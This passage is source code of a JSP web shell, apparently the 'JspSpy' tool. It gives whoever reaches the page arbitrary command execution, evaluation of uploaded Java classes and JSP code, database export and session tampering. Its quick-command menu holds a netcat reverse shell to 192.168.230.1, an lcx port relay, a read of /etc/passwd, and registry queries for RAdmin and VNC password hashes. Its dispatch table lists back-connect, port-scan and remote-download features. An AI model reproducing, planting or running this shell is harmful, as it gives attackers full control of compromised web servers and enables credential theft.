3670. + " <input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"
3671. + " <select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"
3672. + " <option value=\"\" selected> </option>"
3673. + " <option value=\"uname -a\">uname -a</option>"
3674. + " <option value=\"cat /etc/issue\">issue</option>"
3675. + " <option value=\"cat /etc/passwd\">passwd</option>"
3676. + " <option value=\"netstat -an\">netstat -an</option>"
3677. + " <option value=\"net user\">net user</option>"
3678. + " <option value=\"tasklist\">tasklist</option>"
3679. + " <option value=\"tasklist /svc\">tasklist /svc</option>"
3680. + " <option value=\"net start\">net start</option>"
3681. + " <option value=\"net stop policyagent /yes\">net stop</option>"
3682. + " <option value=\"nbtstat -A IP\">nbtstat -A</option>"
3683. + " <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"
3684. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"
3685. + " <option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"
3686. + " <option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"
3687. + " <option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"
3688. + " <option value=\"systeminfo\">systeminfo</option>"
3689. + " <option value=\"net localgroup\">view groups</option>"
3690. + " <option value=\"net localgroup administrators\">view admins</option>"
3691. + " </select>"
3692. + " <input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"
3693. + " <input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"
3694. + " </form>"
3695. + " <iframe style=\"display:none\" name=\"asyn\"></iframe>");
3696. out.println(" </td>" + " </tr>" + "</table>");
3697. } catch (Exception e) {
3698. throw e;
3699. }
3700. }
3701. }
3702.  
3703. private static class OnLineInvoker extends DefaultInvoker {
3704. public boolean doBefore() {
3705. return false;
3706. }
3707.  
3708. public boolean doAfter() {
3709. return false;
3710. }
3711.  
3712. public void invoke(HttpServletRequest request,
3713. HttpServletResponse response, HttpSession JSession)
3714. throws Exception {
3715. try {
3716. String type = request.getParameter("type");
3717. if (Util.isEmpty(type))
3718. return;
3719. if (type.toLowerCase().equals("start")) {
3720. String exe = request.getParameter("exe");
3721. if (Util.isEmpty(exe))
3722. return;
3723. Process pro = Runtime.getRuntime().exec(exe);
3724. ByteArrayOutputStream outs = new ByteArrayOutputStream();
3725. response.setContentLength(100000000);
3726. response.setContentType("text/html;charset="
3727. + System.getProperty("file.encoding"));
3728. OnLineProcess olp = new OnLineProcess(pro);
3729. JSession.setAttribute(SHELL_ONLINE, olp);
3730. new OnLineConnector(new ByteArrayInputStream(outs
3731. .toByteArray()), pro.getOutputStream(),
3732. "exeOclientR", olp).start();
3733. new OnLineConnector(pro.getInputStream(), response
3734. .getOutputStream(), "exeRclientO", olp).start();
3735. new OnLineConnector(pro.getErrorStream(), response
3736. .getOutputStream(), "exeRclientO", olp).start();
3737. Thread.sleep(1000 * 60 * 60 * 24);
3738. } else if (type.equals("ecmd")) {
3739. Object o = JSession.getAttribute(SHELL_ONLINE);
3740. String cmd = request.getParameter("cmd");
3741. if (Util.isEmpty(cmd))
3742. return;
3743. if (o == null)
3744. return;
3745. OnLineProcess olp = (OnLineProcess) o;
3746. olp.setCmd(cmd);
3747. } else {
3748. Object o = JSession.getAttribute(SHELL_ONLINE);
3749. if (o == null)
3750. return;
3751. OnLineProcess olp = (OnLineProcess) o;
3752. olp.stop();
3753. }
3754. } catch (Exception e) {
3755.  
3756. throw e;
3757. }
3758. }
3759. }
3760.  
3761. private static class EnterInvoker extends DefaultInvoker {
3762. public boolean doBefore() {
3763. return false;
3764. }
3765.  
3766. public boolean doAfter() {
3767. return false;
3768. }
3769.  
3770. public void invoke(HttpServletRequest request,
3771. HttpServletResponse response, HttpSession JSession)
3772. throws Exception {
3773. PrintWriter out = response.getWriter();
3774. String type = request.getParameter("type");
3775. if (!Util.isEmpty(type)) {
3776. JSession.removeAttribute(ENTER);
3777. JSession.removeAttribute(ENTER_MSG);
3778. JSession.removeAttribute(ENTER_CURRENT_DIR);
3779. JSession.setAttribute(MSG, "Exit File Success ! ");
3780. } else {
3781. String f = request.getParameter("filepath");
3782. if (Util.isEmpty(f))
3783. return;
3784. JSession.setAttribute(ENTER, f);
3785. JSession
3786. .setAttribute(
3787. ENTER_MSG,
3788. "You Are In File <a style='color:red'>\""
3789. + f
3790. + "\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>");
3791. }
3792. response.sendRedirect(SHELL_NAME);
3793. }
3794. }
3795.  
3796. private static class VExport2FileInvoker extends DefaultInvoker {
3797. public void invoke(HttpServletRequest request,
3798. HttpServletResponse response, HttpSession JSession)
3799. throws Exception {
3800. PrintWriter out = response.getWriter();
3801. String type = request.getParameter("type");
3802. String sql = request.getParameter("sql");
3803. String table = request.getParameter("table");
3804. if (Util.isEmpty(sql) && Util.isEmpty(table)) {
3805. JSession.setAttribute(SESSION_O, "vConn");
3806. response.sendRedirect(SHELL_NAME);
3807. return;
3808. }
3809. out
3810. .println("<form action=\"\" method=\"post\">"
3811. + "<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3812. + " <tr>"
3813. + " <td>"
3814. + " <input type=\"hidden\" name=\"o\" value=\"export\"/>"
3815. + " <input type=\"hidden\" name=\"type\" value=\""
3816. + (Util.isEmpty(type) ? "" : type)
3817. + "\"/>"
3818. + " <input type=\"hidden\" name=\"sql\" value=\""
3819. + (Util.isEmpty(sql) ? "" : sql.replaceAll("\"",
3820. "&quot;"))
3821. + "\"/>"
3822. + " <input type=\"hidden\" name=\"table\" value=\""
3823. + (Util.isEmpty(table) ? "" : table)
3824. + "\"/>"
3825. + " <h2>Export To File &raquo;</h2>"
3826. + " "
3827. + " <hr/>Export \"<span style='color:red;font-weight:bold'>"
3828. + (Util.isEmpty(sql) ? table : sql.replaceAll("\"",
3829. "&quot;"))
3830. + "</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\""
3831. + (JSession.getAttribute(CURRENT_DIR).toString() + "/exportdata.txt")
3832. + "\" size=\"100\" class=\"input\"/>"
3833. + " <select name='encode' class='input'><option value=''>ANSI</option><option value='GBK'>GBK</option><option value='UTF-8'>UTF-8</option><option value='ISO-8859-1'>ISO-8859-1</option></select>"
3834. + " <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>"
3835. + BACK_HREF
3836. + "</td>"
3837. + " </tr>"
3838. + " </table>" + "</form>");
3839. }
3840. }
3841.  
3842. private static class ExportInvoker extends DefaultInvoker {
3843. public boolean doBefore() {
3844. return false;
3845. }
3846.  
3847. public boolean doAfter() {
3848. return false;
3849. }
3850.  
3851. public void invoke(HttpServletRequest request,
3852. HttpServletResponse response, HttpSession JSession)
3853. throws Exception {
3854. String type = request.getParameter("type");
3855. String filepath = request.getParameter("filepath");
3856. String encode = request.getParameter("encode");
3857. String sql = null;
3858. DBOperator dbo = null;
3859. dbo = (DBOperator) JSession.getAttribute(DBO);
3860.  
3861. if (Util.isEmpty(type)) {
3862. //table export
3863. String tb = request.getParameter("table");
3864. if (Util.isEmpty(tb))
3865. return;
3866. String s = dbo.getConn().getMetaData()
3867. .getIdentifierQuoteString();
3868. sql = "select * from " + s + tb + s;
3869.  
3870. } else if (type.equals("queryexp")) {
3871. //query export
3872. sql = request.getParameter("sql");
3873. if (Util.isEmpty(sql)) {
3874. JSession.setAttribute(SESSION_O, "vConn");
3875. response.sendRedirect(SHELL_NAME);
3876. return;
3877. }
3878. }
3879. Object o = dbo.execute(sql);
3880. ByteArrayOutputStream bout = new ByteArrayOutputStream();
3881. byte[] rowSep = "\r\n".getBytes();
3882. if (o instanceof ResultSet) {
3883. ResultSet rs = (ResultSet) o;
3884. ResultSetMetaData meta = rs.getMetaData();
3885. int count = meta.getColumnCount();
3886. for (int i = 1; i <= count; i++) {
3887. String colName = meta.getColumnName(i) + "\t";
3888. byte[] b = null;
3889. if (Util.isEmpty(encode))
3890. b = colName.getBytes();
3891. else
3892. b = colName.getBytes(encode);
3893. bout.write(b, 0, b.length);
3894. }
3895. bout.write(rowSep, 0, rowSep.length);
3896. while (rs.next()) {
3897. for (int i = 1; i <= count; i++) {
3898. String v = null;
3899. try {
3900. v = rs.getString(i);
3901. } catch (SQLException ex) {
3902. v = "<<Error!>>";
3903. }
3904. v += "\t";
3905. byte[] b = null;
3906. if (Util.isEmpty(encode))
3907. b = v.getBytes();
3908. else
3909. b = v.getBytes(encode);
3910. bout.write(b, 0, b.length);
3911. }
3912. bout.write(rowSep, 0, rowSep.length);
3913. }
3914. rs.close();
3915. ByteArrayInputStream input = new ByteArrayInputStream(bout
3916. .toByteArray());
3917. BufferedOutputStream output = null;
3918. if (!Util.isEmpty(filepath)) {
3919. //export2file
3920. output = new BufferedOutputStream(new FileOutputStream(
3921. new File(filepath)));
3922. } else {
3923. //download.
3924. response.setHeader("Content-Disposition",
3925. "attachment;filename=DataExport.txt");
3926. output = new BufferedOutputStream(response
3927. .getOutputStream());
3928. }
3929. byte[] data = new byte[1024];
3930. int len = input.read(data);
3931. while (len != -1) {
3932. output.write(data, 0, len);
3933. len = input.read(data);
3934. }
3935. bout.close();
3936. input.close();
3937. output.close();
3938. if (!Util.isEmpty(filepath)) {
3939. JSession.setAttribute(MSG, "Export To File Success !");
3940. response.sendRedirect(SHELL_NAME);
3941. }
3942. }
3943. }
3944. }
3945.  
3946. private static class EvalInvoker extends DefaultInvoker {
3947. public void invoke(HttpServletRequest request,
3948. HttpServletResponse response, HttpSession JSession)
3949. throws Exception {
3950. String type = request.getParameter("type");
3951. PrintWriter out = response.getWriter();
3952. Object msg = JSession.getAttribute(MSG);
3953. if (msg != null) {
3954. Util.outMsg(out, (String) msg);
3955. JSession.removeAttribute(MSG);
3956. }
3957. if (Util.isEmpty(type)) {
3958. out
3959. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
3960. + " <tr>"
3961. + " <td><h2>Eval Java Code &raquo;</h2>"
3962. + "<hr/>"
3963. + " <p>"
3964. + " <form action=\""
3965. + SHELL_NAME
3966. + "?o=eu\" method=\"post\" enctype=\"multipart/form-data\">"
3967. + "UpLoad a Class File : ");
3968. Util
3969. .outMsg(
3970. out,
3971. "<pre>"
3972. + "<span style='color:blue'>public class</span> SpyEval{\r\n"
3973. + " <span style='color:blue'>static</span> {\r\n"
3974. + " <span style='color:green'>//Your Code Here.</span>\r\n"
3975. + " }\r\n" + "}\r\n" + "</pre>", "left");
3976. out
3977. .println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>"
3978. + " <form action=\""
3979. + SHELL_NAME
3980. + "\" method=\"post\"><p></p>Jsp Eval : <br/>"
3981. + " <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">"
3982. + " <textarea name=\"jspc\" rows=\"15\" cols=\"70\">"
3983. + URLDecoder
3984. .decode(
3985. "%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E",
3986. "utf-8")
3987. + "</textarea>"
3988. + " <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\" />"
3989. + " </form>"
3990. + " </p>"
3991. + " </td>"
3992. + " </tr>" + "</table>");
3993. } else if (type.equals("jsp")) {
3994. String jspc = request.getParameter("jspc");
3995. if (Util.isEmpty(jspc))
3996. return;
3997. File f = new File(SHELL_DIR, "evaltmpninty.jsp");
3998. BufferedWriter writer = new BufferedWriter(
3999. new OutputStreamWriter(new FileOutputStream(f), "utf-8"));
4000. writer.write(jspc, 0, jspc.length());
4001. writer.flush();
4002. writer.close();
4003. out
4004. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
4005. + " <tr>"
4006. + " <td><h2>Jsp Eval Result &raquo;</h2>");
4007. out
4008. .println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">");
4009. request.getRequestDispatcher("evaltmpninty.jsp").include(
4010. request, response);
4011. out
4012. .println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> ");
4013. f.delete();
4014. }
4015. }
4016. }
4017.  
4018. private static class EvalUploadInvoker extends DefaultInvoker {
4019. public void invoke(HttpServletRequest request,
4020. HttpServletResponse response, HttpSession JSession)
4021. throws Exception {
4022. ByteArrayOutputStream stream = new ByteArrayOutputStream();
4023. UploadBean upload = new UploadBean();
4024. upload.setTargetOutput(stream);
4025. upload.parseRequest(request);
4026.  
4027. if (stream.toByteArray().length == 2) {
4028. JSession.setAttribute(MSG, "Please Upload Your Class File ! ");
4029. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
4030. return;
4031. }
4032. SpyClassLoader loader = new SpyClassLoader();
4033. try {
4034. Class c = loader.defineClass(null, stream.toByteArray());
4035. c.newInstance();
4036. } catch (Exception e) {
4037. }
4038. stream.close();
4039. JSession.setAttribute(MSG, "Eval Java Class Done ! ");
4040. ((Invoker) ins.get("ev")).invoke(request, response, JSession);
4041. }
4042. }
4043.  
4044. private static class VOtherInvoker extends DefaultInvoker {
4045. public void invoke(HttpServletRequest request,
4046. HttpServletResponse response, HttpSession JSession)
4047. throws Exception {
4048. try {
4049. PrintWriter out = response.getWriter();
4050. Object msg = JSession.getAttribute(MSG);
4051. if (msg != null) {
4052. Util.outMsg(out, (String) msg);
4053. JSession.removeAttribute(MSG);
4054. }
4055. out
4056. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
4057. + " <tr>"
4058. + " <td><h2 id=\"Bin_H2_Title\">Session Manager&gt;&gt;</h2><hr/>"
4059. + " <div id=\"hOWTm\" style=\"line-height:30px\">"
4060. + " <ul>");
4061. Enumeration en = JSession.getAttributeNames();
4062. while (en.hasMoreElements()) {
4063. Object o = en.nextElement();
4064. if (o.toString().equals(MSG))
4065. continue;
4066. out
4067. .println("<li><form action='"
4068. + SHELL_NAME
4069. + "' method='post'><u>"
4070. + o.toString()
4071. + "</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\""
4072. + JSession.getAttribute(o.toString())
4073. + "\">");
4074. out
4075. .println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>");
4076. out
4077. .println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>");
4078. out.println("<input type='hidden' name='name' value='"
4079. + o.toString() + "'/>");
4080. out.println("</form></li>");
4081. }
4082. out
4083. .println("<li style='list-style:none'><form action='"
4084. + SHELL_NAME
4085. + "' method='post'><fieldset>"
4086. + "<legend>New Session Attribute</legend>"
4087. + "name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\""
4088. + " name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>"
4089. + " </fieldset></form></li></ul></div></td>"
4090. + " </tr>" + " </table>");
4091. } catch (Exception e) {
4092. throw e;
4093. }
4094. }
4095. }
4096.  
4097. //Session Manager
4098. private static class SmInvoker extends DefaultInvoker {
4099. public void invoke(HttpServletRequest request,
4100. HttpServletResponse response, HttpSession JSession)
4101. throws Exception {
4102. try {
4103. String type = request.getParameter("type");
4104. PrintWriter out = response.getWriter();
4105. if (type.equals("update")) {
4106. String name = request.getParameter("name");
4107. String value = request.getParameter("value");
4108. JSession.setAttribute(name, value);
4109. JSession
4110. .setAttribute(MSG, "Update/Add Attribute Success !");
4111. } else if (type.equals("delete")) {
4112. String name = request.getParameter("name");
4113. JSession.removeAttribute(name);
4114. JSession.setAttribute(MSG, "Remove Attribute Success !");
4115. }
4116. ((Invoker) ins.get("vother")).invoke(request, response,
4117. JSession);
4118. } catch (Exception e) {
4119.  
4120. throw e;
4121. }
4122. }
4123. }
4124.  
4125. static {
4126. ins.put("script", new ScriptInvoker());
4127. ins.put("before", new BeforeInvoker());
4128. ins.put("after", new AfterInvoker());
4129. ins.put("deleteBatch", new DeleteBatchInvoker());
4130. ins.put("clipboard", new ClipBoardInvoker());
4131. ins.put("vPortScan", new VPortScanInvoker());
4132. ins.put("portScan", new PortScanInvoker());
4133. ins.put("vConn", new VConnInvoker());
4134. ins.put("dbc", new DbcInvoker());
4135. ins.put("executesql", new ExecuteSQLInvoker());
4136. ins.put("vLogin", new VLoginInvoker());
4137. ins.put("login", new LoginInvoker());
4138. ins.put("filelist", new FileListInvoker());
4139. ins.put("logout", new LogoutInvoker());
4140. ins.put("upload", new UploadInvoker());
4141. ins.put("copy", new CopyInvoker());
4142. ins.put("bottom", new BottomInvoker());
4143. ins.put("vCreateFile", new VCreateFileInvoker());
4144. ins.put("vEdit", new VEditInvoker());
4145. ins.put("createFile", new CreateFileInvoker());
4146. ins.put("vEditProperty", new VEditPropertyInvoker());
4147. ins.put("editProperty", new EditPropertyInvoker());
4148. ins.put("vs", new VsInvoker());
4149. ins.put("shell", new ShellInvoker());
4150. ins.put("down", new DownInvoker());
4151. ins.put("vd", new VdInvoker());
4152. ins.put("downRemote", new DownRemoteInvoker());
4153. ins.put("index", new IndexInvoker());
4154. ins.put("mkdir", new MkDirInvoker());
4155. ins.put("move", new MoveInvoker());
4156. ins.put("removedir", new RemoveDirInvoker());
4157. ins.put("packBatch", new PackBatchInvoker());
4158. ins.put("pack", new PackInvoker());
4159. ins.put("unpack", new UnPackInvoker());
4160. ins.put("vmp", new VmpInvoker());
4161. ins.put("vbc", new VbcInvoker());
4162. ins.put("backConnect", new BackConnectInvoker());
4163. ins.put("jspEnv", new JspEnvInvoker());
4164. ins.put("smp", new SmpInvoker());
4165. ins.put("mapPort", new MapPortInvoker());
4166. ins.put("top", new TopInvoker());
4167. ins.put("vso", new VOnLineShellInvoker());
4168. ins.put("online", new OnLineInvoker());
4169. ins.put("enter", new EnterInvoker());
4170. ins.put("export", new ExportInvoker());
4171. ins.put("ev", new EvalInvoker());
4172. ins.put("eu", new EvalUploadInvoker());
4173. ins.put("vother", new VOtherInvoker());
4174. ins.put("sm", new SmInvoker());
4175. ins.put("vExport", new VExport2FileInvoker());
4176. ins.put("vPack", new VPackConfigInvoker());
4177. ins.put("reflect", new ReflectInvoker());
4178. ins.put("portBack", new PortBackInvoker());
4179. }%>
4180. <%
4181. try {
4182. String o = request.getParameter("o");
4183. if (Util.isEmpty(o)) {
4184. if (session.getAttribute(SESSION_O) == null)
4185. o = "index";
4186. else {
4187. o = session.getAttribute(SESSION_O).toString();
4188. session.removeAttribute(SESSION_O);
4189. }
4190. }
4191. Object obj = ins.get(o);
4192. if (obj == null) {
4193. response.sendRedirect(SHELL_NAME);
4194. } else {
4195. Invoker in = (Invoker) obj;
4196. if (in.doBefore()) {
4197. String path = request.getParameter("folder");
4198. if (!Util.isEmpty(path)
4199. && session.getAttribute(ENTER) == null)
4200. session.setAttribute(CURRENT_DIR, path);
4201. ((Invoker) ins.get("before")).invoke(request, response,
4202. session);
4203. ((Invoker) ins.get("script")).invoke(request, response,
4204. session);
4205. ((Invoker) ins.get("top")).invoke(request, response,
4206. session);
4207. }
4208. in.invoke(request, response, session);
4209. if (!in.doAfter()) {
4210. return;
4211. } else {
4212. ((Invoker) ins.get("bottom")).invoke(request, response,
4213. session);
4214. ((Invoker) ins.get("after")).invoke(request, response,
4215. session);
4216. }
4217. }
4218. } catch (Exception e) {
4219. Object msg = session.getAttribute(MSG);
4220. if (msg != null) {
4221. Util.outMsg(out, (String) msg);
4222. session.removeAttribute(MSG);
4223. }
4224. if (e.toString().indexOf("ClassCastException") != -1) {
4225. Util.outMsg(out, MODIFIED_ERROR + BACK_HREF);
4226. }
4227. ByteArrayOutputStream bout = new ByteArrayOutputStream();
4228. e.printStackTrace(new PrintStream(bout));
4229. session.setAttribute(CURRENT_DIR, SHELL_DIR);
4230. Util.outMsg(out, Util
4231. .htmlEncode(new String(bout.toByteArray())).replaceAll(
4232. "\n", "<br/>"), "left");
4233. bout.close();
4234. out.flush();
4235. ((Invoker) ins.get("bottom"))
4236. .invoke(request, response, session);
4237. ((Invoker) ins.get("after")).invoke(request, response, session);
4238. }
4239. %>